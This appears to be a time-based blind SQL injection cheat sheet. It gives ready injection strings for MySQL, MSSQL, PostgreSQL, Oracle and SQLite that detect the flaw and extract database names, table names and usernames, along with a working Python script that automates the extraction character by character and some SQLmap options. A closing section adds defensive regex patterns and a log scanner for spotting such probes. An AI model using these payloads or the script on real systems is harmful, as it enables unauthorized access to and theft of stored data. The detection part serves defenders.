Overview

No visible difference in output between true and false conditions. Inject a conditional SLEEP/WAITFOR and measure response time to infer true/false. Slowest technique, but it works when boolean-based blind injection doesn't.

Detect

MySQL

' AND SLEEP(5)-- -                    → 5 sec delay = injectable
' AND IF(1=1,SLEEP(5),0)-- -         → 5 sec delay
' AND IF(1=2,SLEEP(5),0)-- -         → No delay

MSSQL

'; WAITFOR DELAY '0:0:5'-- -         → 5 sec delay
'; IF (1=1) WAITFOR DELAY '0:0:5'-- -

PostgreSQL

'; SELECT pg_sleep(5)-- -
' AND (SELECT CASE WHEN 1=1 THEN pg_sleep(5) ELSE pg_sleep(0) END)-- -

Oracle

' AND 1=DBMS_PIPE.RECEIVE_MESSAGE('a',5)-- -

SQLite

' AND 1=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000))))-- -

Extract Data — MySQL

Database Length

' AND IF(LENGTH(database())=5,SLEEP(3),0)-- -

Database Name

' AND IF(ASCII(SUBSTRING(database(),1,1))>100,SLEEP(3),0)-- -
' AND IF(ASCII(SUBSTRING(database(),1,1))=116,SLEEP(3),0)-- -

Table Names

' AND IF(ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1),1,1))>100,SLEEP(3),0)-- -

Dump Data

' AND IF(ASCII(SUBSTRING((SELECT username FROM users LIMIT 0,1),1,1))=97,SLEEP(3),0)-- -

Extract Data — MSSQL

'; IF (ASCII(SUBSTRING(DB_NAME(),1,1))>100) WAITFOR DELAY '0:0:3'-- -
'; IF (ASCII(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'),1,1))>100) WAITFOR DELAY '0:0:3'-- -

Extract Data — PostgreSQL

' AND (SELECT CASE WHEN ASCII(SUBSTRING(current_database(),1,1))>100 THEN pg_sleep(3) ELSE pg_sleep(0) END)-- -

Automation Script (Python)

import requests
import time

url = "http://TARGET/page"
DELAY = 2          # seconds of SLEEP() injected; keep above the measured baseline latency
result = ""

for pos in range(1, 50):
    # Binary-search the ASCII value of character `pos`. Start at 0 so that an
    # empty SUBSTRING() (MySQL ASCII('') returns 0) leaves low == 0 and ends the loop;
    # the original `low > 126` check could never trigger and appended spaces forever.
    low, high = 0, 126
    while low <= high:
        mid = (low + high) // 2
        payload = f"' AND IF(ASCII(SUBSTRING(database(),{pos},1))>{mid},SLEEP({DELAY}),0)-- -"
        start = time.time()
        r = requests.get(url, params={"id": payload}, timeout=DELAY * 5)
        elapsed = time.time() - start
        if elapsed >= DELAY:      # delayed response = condition true
            low = mid + 1
        else:
            high = mid - 1
    if low == 0:                  # past the end of the string
        break
    result += chr(low)
    print(f"[+] {result}")

print(f"Result: {result}")

Tips

  • Use 2-3 sec delay (not too long, not too short)
  • Network latency can cause false positives; measure the baseline response time first
  • Binary search reduces requests per character (~7 vs ~95)
  • Use --technique=T --time-sec=3 in SQLmap

Quick Reference

Database     Sleep Function
MySQL        SLEEP(N) or BENCHMARK(N,expr)
MSSQL        WAITFOR DELAY '0:0:N'
PostgreSQL   pg_sleep(N)
Oracle       DBMS_PIPE.RECEIVE_MESSAGE('a',N)
SQLite       LIKE('ABC',UPPER(HEX(RANDOMBLOB(N))))
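The sleep primitives in the Quick Reference are also what a WAF rule or log search keys on from the defender's side, and the latency caveat from Tips applies in reverse: a matched probe whose response also took far longer than baseline is the strongest signal. Added example, not from the original page: it scans constructed access-log lines (combined format with an assumed trailing response-time field in milliseconds) for those primitives and flags responses far slower than an assumed baseline.

```python
import re
from urllib.parse import unquote_plus

# Sleep primitives from the Quick Reference, one regex per DBMS, matched
# case-insensitively against the URL-decoded request path.
SLEEP_PRIMITIVES = {
    "mysql":      r"\bSLEEP\s*\(|\bBENCHMARK\s*\(",
    "mssql":      r"\bWAITFOR\s+DELAY\b",
    "postgresql": r"\bpg_sleep\s*\(",
    "oracle":     r"\bDBMS_PIPE\.RECEIVE_MESSAGE\s*\(",
    "sqlite":     r"\bRANDOMBLOB\s*\(",
}
_COMPILED = {db: re.compile(p, re.IGNORECASE) for db, p in SLEEP_PRIMITIVES.items()}

# Access-log line: combined format plus an assumed trailing response-time
# field in milliseconds (e.g. nginx $request_time scaled to ms).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ (?P<ms>\d+)$'
)

# Constructed sample lines: a true probe (slow), a false probe (fast), an MSSQL
# probe, and a benign search term containing the word "sleep".
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /page?id=1 HTTP/1.1" 200 512 41
203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /page?id=1%27%20AND%20IF(1%3D1,SLEEP(5),0)--%20- HTTP/1.1" 200 512 5044
203.0.113.5 - - [10/Oct/2023:13:55:43 +0000] "GET /page?id=1%27%20AND%20IF(1%3D2,SLEEP(5),0)--%20- HTTP/1.1" 200 512 39
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /page?id=1%27;%20WAITFOR%20DELAY%20%270:0:5%27--%20- HTTP/1.1" 500 0 5010
198.51.100.7 - - [10/Oct/2023:13:56:10 +0000] "GET /search?q=sleep%20well HTTP/1.1" 200 2048 37
"""

def find_time_based_probes(log_text, baseline_ms=100, slow_factor=20):
    """Return (ip, dbms, response_ms, delayed) for every request whose decoded
    path contains a sleep primitive.  delayed=True means the response took far
    longer than baseline, i.e. the injected condition probably evaluated true."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = unquote_plus(m["path"])
        for dbms, rx in _COMPILED.items():
            if rx.search(decoded):
                ms = int(m["ms"])
                hits.append((m["ip"], dbms, ms, ms > baseline_ms * slow_factor))
                break
    return hits
```

Two probes from the same source within seconds, one slow and one fast, is the true/false pair pattern from the Detect section and is worth alerting on even when the individual requests return 200.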